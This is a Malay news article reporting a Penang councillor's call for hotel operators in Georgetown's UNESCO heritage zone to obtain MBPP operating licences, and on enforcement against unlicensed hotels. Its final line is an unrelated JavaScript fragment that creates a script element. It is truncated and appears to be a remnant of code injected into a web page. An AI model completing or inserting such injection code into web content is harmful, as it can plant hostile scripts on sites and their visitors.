Pengusaha hotel diseru pohon lesen operasi sah

GEORGETOWN – Exco Kerajaan Tempatan, Pengurusan Lalulintas & Tebatan Banjir, Chow Kon Yeow menggesa pengusahapengusaha hotel yang ingin beroperasi di Tapak Warisan Dunia UNESCO supaya memohon lesen operasi sah melalui Majlis Bandaraya Pulau Pinang (MBPP).

Katanya, pengusaha sepatutnya mendapatkan lesen terlebih dahulu sebelum memulakan perniagaan untuk tidak mengabaikan keselamatan para pelanggan.

“Walaupun proses untuk mendapatkan lesen adalah rumit, namun ia bukanlah sesuatu yang mustahil. Ini kerana lesen dapat diperoleh sekiranya seseorang pemilik sanggup mematuhi garis panduan disediakan.

“Malah, Kerajaan Negeri melalui MBPP turut berusaha membantu para pengusaha memperoleh lesen yang sah dengan melonggarkan syarat-syarat permohonan. “Ini termasuk melonggarkan syarat berhubung penyediaan tempat letak kereta untuk pelanggan,’’ katanya ketika mengadakan lawatan ke sebuah hotel berlesen di Tapak Warisan Dunia UNESCO di sini baru-baru ini.

Turut serta, Pengarah Jabatan Bangunan MBPP, Ar. Yew Tung Seang, Penolong Pengawai Kesihatan Persekitaran Kanan (Utara) MBPP, Goh Eng Chun dan pemilik hotel berkaitan, Spices Hotel, Michael Ong Chin Keong.

Lawatan tersebut adalah susulan daripada operasi bersepadu MBPP terhadap operatoroperator hotel yang telah memulakan perniagaan tanpa mengikuti proses undangundang pihak berkuasa tempatan (PBT) terbabit.

Sebelum ini, sebanyak tiga hotel telah berdepan dengan tindakan penguatkuasaan MBPP dalam operasi ‘pemutihan hotel’ yang dijalankan.

var d=document;var s=d.createElement(‘script’);